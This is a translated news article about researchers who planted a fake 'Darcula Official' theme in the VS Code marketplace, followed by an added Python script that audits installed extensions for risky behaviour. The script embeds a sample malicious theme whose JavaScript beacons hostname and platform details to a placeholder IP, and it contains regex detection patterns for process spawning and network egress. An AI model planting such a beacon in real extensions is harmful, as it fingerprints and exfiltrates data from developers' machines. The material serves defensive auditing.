Attack Surface Management, Security Operations
Researchers use fake extensions to infiltrate major organizations
Prajit Nair (translator)
June 13, 2024
Cybersecurity researchers say their experiment to develop fake and malicious extensions for the world’s most popular integrated development environment has exceeded their expectations.
Researchers Amit Assaraf, Itay Kuruk and Idan Dardikman uploaded a color theme extension to Microsoft's Visual Studio Code marketplace that posed as the popular "Dracula Official" color theme, which has roughly 7.2 million installations.
Assaraf and his colleagues named their look-alike "Darcula Official."
Extensions are a key feature of VSCode, allowing developers to turn their VSCode instance into a customizable editor with the functionality they need beyond the features provided out of the box. In a blog post, Assaraf said there are about 60,000 VSCode extensions from about 45,000 different publishers. Of those, only about 1,800 come from verified publishers, and becoming a verified publisher turned out to require little more than proving control of a domain, which the researchers did with darculatheme.com.
The extension quickly gained popularity and was installed more than 100 times in a single day, including on Windows machines belonging to a publicly traded company with a market capitalization of $483 billion, which Assaraf declined to reveal. The fake extension stole source code and also sent out beacons containing details about the host machine, including hostname, domain, platform and number of installed extensions.
Their success is due to poor design choices made by Microsoft, Assaraf wrote in a follow-up blog post.
“Microsoft does not implement any kind of permission management or visibility for installed extensions, so any extension can perform any API action,” he said. “For example, a theme extension that simply changes the colors in your IDE could execute code and read and write files without any visibility or explicit permission from the user.”
Microsoft also does not restrict what VSCode extensions can do on the host machine, "allowing them to spawn child processes, execute system calls, and import arbitrary NodeJS packages, which is highly dangerous." The researcher also criticized Microsoft for allowing silent auto-updates of extensions, which paves the way for attackers to distribute a legitimate extension and turn it malicious later.
The researchers investigated whether bad actors had previously used similar tactics and found 1,283 extensions containing malicious code that had been installed 229 million times, 8,161 extensions communicating with hardcoded IP addresses, 1,452 extensions running unknown executable binaries, and 2,304 extensions using another publisher’s GitHub repository as their official repository.
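The two passages above describe the gap (a "theme" can ship executable code with full API access, spawn processes, beacon to hardcoded IPs, and update silently) and the indicators the researchers hunted for across the marketplace. The following audit script is an added example, not the researchers' code and not ExtensionTotal: it walks the local extension folder under ~/.vscode/extensions, reads each extension's package.json and entry-point source, and flags those same indicators, and it checks settings.json for the auto-update settings that VS Code enables by default. The regex heuristics, the finding names and the sample "theme" embedded at the bottom are all constructed for this demonstration; a 203.0.113.x address is used because that range is reserved for documentation.

```python
"""Audit installed VS Code extensions for behaviour a colour theme has no reason to have.

Added example: not the researchers' tooling. Heuristics are regex-based and illustrative;
production tooling would parse the JavaScript and resolve the real marketplace metadata.
"""
import json
import re
from pathlib import Path

# Hypothetical indicators, chosen to mirror the article's findings: process spawning,
# network egress, hardcoded IPv4 literals, host fingerprinting, and file reads.
PATTERNS = {
    "spawns_processes": re.compile(r"\bchild_process\b|\b(spawn|exec|execFile|fork)\s*\("),
    "network_egress": re.compile(r"\b(https?|net)\.(request|get|connect)\s*\(|\bfetch\s*\("),
    "hardcoded_ip": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "host_fingerprinting": re.compile(r"\bos\.(hostname|platform|userInfo)\s*\(|extensions\.all\b"),
    "reads_workspace_files": re.compile(r"\bfs\.(readFileSync|readFile|readdirSync|readdir)\s*\(|workspace\.fs\b"),
}
# Contribution points that a pure theme needs; anything with these AND an entry point runs code.
THEME_ONLY = {"themes", "iconThemes", "productIconThemes"}


def audit_extension(pkg: dict, source: str) -> list[str]:
    """Return finding names for one extension from its package.json dict and entry-point source."""
    findings = []
    contributes = set(pkg.get("contributes", {}))
    has_code = bool(pkg.get("main") or pkg.get("browser"))
    if has_code and contributes and contributes <= THEME_ONLY:
        findings.append("theme_with_code")  # VS Code runs it with the full extension API, no prompt
    if "*" in pkg.get("activationEvents", []):
        findings.append("activates_on_startup")  # runs as soon as the editor opens, every time
    for name, regex in PATTERNS.items():
        if regex.search(source):
            findings.append(name)
    return findings


def audit_settings(settings: dict) -> list[str]:
    """Flag the silent auto-update behaviour; both settings default to 'on' when absent."""
    findings = []
    # extensions.autoUpdate may be true/false or a string mode; only False disables it.
    if settings.get("extensions.autoUpdate", True) is not False:
        findings.append("auto_update_enabled")
    if settings.get("extensions.autoCheckUpdates", True):
        findings.append("auto_check_updates_enabled")
    return findings


def audit_directory(root: Path) -> dict[str, list[str]]:
    """Audit every <root>/<publisher.name-version>/package.json; returns {folder: findings}."""
    results = {}
    for pkg_path in root.glob("*/package.json"):
        pkg = json.loads(pkg_path.read_text(encoding="utf-8", errors="replace"))
        entry = pkg.get("main") or pkg.get("browser")
        source = ""
        if entry:
            for candidate in (pkg_path.parent / entry, (pkg_path.parent / entry).with_suffix(".js")):
                if candidate.is_file():
                    source = candidate.read_text(encoding="utf-8", errors="replace")
                    break
        findings = audit_extension(pkg, source)
        if findings:
            results[pkg_path.parent.name] = findings
    return results


# Constructed sample: a "theme" whose manifest also declares an entry point that beacons host
# details to a hardcoded address. Names and address are made up for this demo.
FAKE_THEME_PKG = {
    "name": "example-theme", "publisher": "example", "main": "./out/extension.js",
    "activationEvents": ["*"],
    "contributes": {"themes": [{"label": "Example Dark", "uiTheme": "vs-dark", "path": "./themes/dark.json"}]},
}
FAKE_THEME_SOURCE = """
const os = require('os'), https = require('https'), vscode = require('vscode');
function activate() {
  const beacon = { host: os.hostname(), platform: os.platform(), ext: vscode.extensions.all.length };
  const req = https.request({ host: '203.0.113.10', path: '/b', method: 'POST' });
  req.end(JSON.stringify(beacon));
}
module.exports = { activate };
"""
# Constructed sample: an honest theme has contribution points but no code to run.
BENIGN_THEME_PKG = {"name": "plain-theme", "publisher": "example",
                    "contributes": {"themes": [{"label": "Plain", "uiTheme": "vs", "path": "./plain.json"}]}}

if __name__ == "__main__":
    print("sample theme:", audit_extension(FAKE_THEME_PKG, FAKE_THEME_SOURCE))
    print("benign theme:", audit_extension(BENIGN_THEME_PKG, ""))
    user_settings = Path.home() / ".config" / "Code" / "User" / "settings.json"  # Linux path
    if user_settings.is_file():
        print("settings:", audit_settings(json.loads(user_settings.read_text(encoding="utf-8"))))
    for folder, found in audit_directory(Path.home() / ".vscode" / "extensions").items():
        print(folder, found)
```

The `theme_with_code` finding is the one that matters most: a theme needs only JSON under `contributes`, so any `main` or `browser` entry point is a reason to open the folder and read what it does. The settings check is the local mitigation for the auto-update criticism; setting `extensions.autoUpdate` to `false` means a later malicious release of an already-installed extension is not pulled in silently.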
Following their findings, the researchers have begun a process of responsible disclosure to affected companies and have also developed a tool, ExtensionTotal, aimed at analyzing and assessing the risk of VSCode extensions.